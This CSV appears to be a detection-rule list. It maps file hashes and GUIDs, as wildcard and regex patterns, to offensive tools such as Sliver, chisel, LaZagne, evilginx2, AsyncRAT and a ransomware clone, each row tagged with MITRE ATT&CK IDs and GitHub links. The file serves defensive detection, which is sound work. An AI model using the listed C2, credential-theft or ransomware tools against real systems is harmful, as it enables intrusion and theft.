"*767ba8f7f88dcc0b5488ca7c93a5e29a7a6ed3195b8ac4027e0108db0ff2805d*",".{0,1000}767ba8f7f88dcc0b5488ca7c93a5e29a7a6ed3195b8ac4027e0108db0ff2805d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - 
TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*76b70dcbcb1d45935f1b12eef38162b812f88bb4ff89a07a46609d879019103e*",".{0,1000}76b70dcbcb1d45935f1b12eef38162b812f88bb4ff89a07a46609d879019103e.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*76c30e2ea86c1c11238c23cc8e6e88ed76cfd666832df7af587036d20a1e98b5*",".{0,1000}76c30e2ea86c1c11238c23cc8e6e88ed76cfd666832df7af587036d20a1e98b5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*76c7648f79cc5a78f49e9ca24b26a82348e0292b3676ae04bdf22a88cb7eeadc*",".{0,1000}76c7648f79cc5a78f49e9ca24b26a82348e0292b3676ae04bdf22a88cb7eeadc.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*76d3b949f37c9e74abb3b4bf91727c4feaf3feba1e32a42706a7843cf83d5c60*",".{0,1000}76d3b949f37c9e74abb3b4bf91727c4feaf3feba1e32a42706a7843cf83d5c60.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*76d64e0cf551962a2ba20813933207dd398d1d06383c27765874219642218eca*",".{0,1000}76d64e0cf551962a2ba20813933207dd398d1d06383c27765874219642218eca.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*76d92b0b8c428610081a7c45645612af9a7309cafd971a366d5992f5654f5f51*",".{0,1000}76d92b0b8c428610081a7c45645612af9a7309cafd971a366d5992f5654f5f51.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*76FFA92B-429B-4865-970D-4E7678AC34EA*",".{0,1000}76FFA92B\-429B\-4865\-970D\-4E7678AC34EA.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*772a8b19e2abd21dc6f10dc1ac4ff07e52e8f242716c1308e14a1e9fb81e7cd7*",".{0,1000}772a8b19e2abd21dc6f10dc1ac4ff07e52e8f242716c1308e14a1e9fb81e7cd7.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" 
"*7734774a6bbb47e7c0f32f4903928df120887180ddae7bb2bd4d15cd17a4a7c1*",".{0,1000}7734774a6bbb47e7c0f32f4903928df120887180ddae7bb2bd4d15cd17a4a7c1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*7739fe1e685d5ec7296d83851614eb9cedaf7472aece8e1144f2b14fa544db57*",".{0,1000}7739fe1e685d5ec7296d83851614eb9cedaf7472aece8e1144f2b14fa544db57.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7760248F-9247-4206-BE42-A6952AA46DA2*",".{0,1000}7760248F\-9247\-4206\-BE42\-A6952AA46DA2.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" 
"*7760248F-9247-4206-BE42-A6952AA46DA2*",".{0,1000}7760248F\-9247\-4206\-BE42\-A6952AA46DA2.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*7760d7ef318933db6b09dba08ec12ddf25ead0512c45bd914256c97470c4eb29*",".{0,1000}7760d7ef318933db6b09dba08ec12ddf25ead0512c45bd914256c97470c4eb29.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*7767C300-5FD5-4A5D-9D4C-59559CCE48A3*",".{0,1000}7767C300\-5FD5\-4A5D\-9D4C\-59559CCE48A3.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","N/A","10","10","2110","708","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z" "*7787d9292fae90d6ac9b4b9e691ae56a08e199ea96a974d45c26bc5cb30f3d8e*",".{0,1000}7787d9292fae90d6ac9b4b9e691ae56a08e199ea96a974d45c26bc5cb30f3d8e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*778b2aafed8b0255a30082314f27182bb6f88c3aed0ecbda92aa092515acf955*",".{0,1000}778b2aafed8b0255a30082314f27182bb6f88c3aed0ecbda92aa092515acf955.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*77b1042ad03c451d66b967673277d153869dafec091c3b43167c309722af44db*",".{0,1000}77b1042ad03c451d66b967673277d153869dafec091c3b43167c309722af44db.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*77b587e37104e7a1e8858e76cbfa2580d8633ce37c836e28c3ebbdfcf3db0571*",".{0,1000}77b587e37104e7a1e8858e76cbfa2580d8633ce37c836e28c3ebbdfcf3db0571.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*77b78b6e16972c318fcbba39976858787cc31038f82952d2a94f844f5847a61e*",".{0,1000}77b78b6e16972c318fcbba39976858787cc31038f82952d2a94f844f5847a61e.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*77de77149c63a656601bc3d0f4c2704ca8e22673abfb1d235e4f45d5e5befb56*",".{0,1000}77de77149c63a656601bc3d0f4c2704ca8e22673abfb1d235e4f45d5e5befb56.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*77ec2daecb8490e270bf628cbd585180731178e4a859e75c833dfcfffabcf34f*",".{0,1000}77ec2daecb8490e270bf628cbd585180731178e4a859e75c833dfcfffabcf34f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*77efc4024d86cf813ea6f93ef2b98dd4ff8bb8a46f0fd145465786690a27b169*",".{0,1000}77efc4024d86cf813ea6f93ef2b98dd4ff8bb8a46f0fd145465786690a27b169.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*77F955C3-4910-49EA-9CD4-CBF5AD9C071A*",".{0,1000}77F955C3\-4910\-49EA\-9CD4\-CBF5AD9C071A.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*7806b81514ecc44219a6f6193b15b23aea0a947f3c91b339332bea1445745596*",".{0,1000}7806b81514ecc44219a6f6193b15b23aea0a947f3c91b339332bea1445745596.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - 
TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*78434b52f03704cdf214f0497bdef7180741d5d7e40f404970508490c76731ec*",".{0,1000}78434b52f03704cdf214f0497bdef7180741d5d7e40f404970508490c76731ec.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*784F8029-4D72-4363-9638-5A8D11545494*",".{0,1000}784F8029\-4D72\-4363\-9638\-5A8D11545494.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*7864978aad22ff10f75864376b0e57d7ec3ba8bd84e663c2c650f5fc45a9b388*",".{0,1000}7864978aad22ff10f75864376b0e57d7ec3ba8bd84e663c2c650f5fc45a9b388.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. 
On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*787695c6fb15d43a120150628c8d0717983a797682b76106984d717379ccaed0*",".{0,1000}787695c6fb15d43a120150628c8d0717983a797682b76106984d717379ccaed0.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*789CF3CBCC0DC849CC2B51703652084E2D2A4B2D02003B5C0650*",".{0,1000}789CF3CBCC0DC849CC2B51703652084E2D2A4B2D02003B5C0650.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*78a8a0392afbefb487d65be78caff5efb2f2f55de2593ea90c0ab23ed727afe2*",".{0,1000}78a8a0392afbefb487d65be78caff5efb2f2f55de2593ea90c0ab23ed727afe2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*78b372bf29a88ec2683f975ab11a728a53a19dba021023d9b2ee46fb94cf3a66*",".{0,1000}78b372bf29a88ec2683f975ab11a728a53a19dba021023d9b2ee46fb94cf3a66.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*78bbfbd2d6f42dad63fe000ec04b0c74bd35270b2cc5765404f5c780fe398f88*",".{0,1000}78bbfbd2d6f42dad63fe000ec04b0c74bd35270b2cc5765404f5c780fe398f88.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*78c15e32aa0d34c32550129f8f40cd76da56bef72a5efd949f92563876a74975*",".{0,1000}78c15e32aa0d34c32550129f8f40cd76da56bef72a5efd949f92563876a74975.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*78C76961-8249-4EFE-9DE2-B6EF15A187F7*",".{0,1000}78C76961\-8249\-4EFE\-9DE2\-B6EF15A187F7.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*78eed41cec221edd4ffed223f2fd2271a96224fd1173ed685c8c0b274fe93029*",".{0,1000}78eed41cec221edd4ffed223f2fd2271a96224fd1173ed685c8c0b274fe93029.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*78fb6b3b97fe4c42400a477e013f1f848a5ccec7d4cf51d7087faf0583ad491e*",".{0,1000}78fb6b3b97fe4c42400a477e013f1f848a5ccec7d4cf51d7087faf0583ad491e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*793f49ad93a26d3c9407ac76af0a8785610db3216cc96b348f6417c2e3583575*",".{0,1000}793f49ad93a26d3c9407ac76af0a8785610db3216cc96b348f6417c2e3583575.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7943C5FF-C219-4E0B-992E-0ECDEB2681F3*",".{0,1000}7943C5FF\-C219\-4E0B\-992E\-0ECDEB2681F3.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" "*79520C3A-4931-46EB-92D7-334DA7FC9013*",".{0,1000}79520C3A\-4931\-46EB\-92D7\-334DA7FC9013.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*795f2e9d0314898ba5a63bd1fdc5fa18*",".{0,1000}795f2e9d0314898ba5a63bd1fdc5fa18.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*79816edc41cd5e2aeb19f0227e9cb9ab0b5abcc54931c6bf29813f8762828805*",".{0,1000}79816edc41cd5e2aeb19f0227e9cb9ab0b5abcc54931c6bf29813f8762828805.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*79acacd2433990d8fe71ee9583123240b34ae26f4913d62b796238f4a302e104*",".{0,1000}79acacd2433990d8fe71ee9583123240b34ae26f4913d62b796238f4a302e104.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","10","10","2034","462","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z" "*79f4a5f47346781f2b5d7ffbf570db04e0410c435b5bf993ce4e3e3bfbc6e850*",".{0,1000}79f4a5f47346781f2b5d7ffbf570db04e0410c435b5bf993ce4e3e3bfbc6e850.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*79F54747-048D-4FD6-AEF4-7B098F923FD8*",".{0,1000}79F54747\-048D\-4FD6\-AEF4\-7B098F923FD8.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*7a2fb0b27e7c44f2a37ad254df79b3677b010d34bf6421281a2a37c1088d613f*",".{0,1000}7a2fb0b27e7c44f2a37ad254df79b3677b010d34bf6421281a2a37c1088d613f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*7a32219b9b7ba4fca2fd03d0f2387245b9f3049521b9076a5ab4a21f57bb977f*",".{0,1000}7a32219b9b7ba4fca2fd03d0f2387245b9f3049521b9076a5ab4a21f57bb977f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7a324791d74e0a99c63686f9e2cd5be616286fbd19b74f780de251e3d8ab87a7*",".{0,1000}7a324791d74e0a99c63686f9e2cd5be616286fbd19b74f780de251e3d8ab87a7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 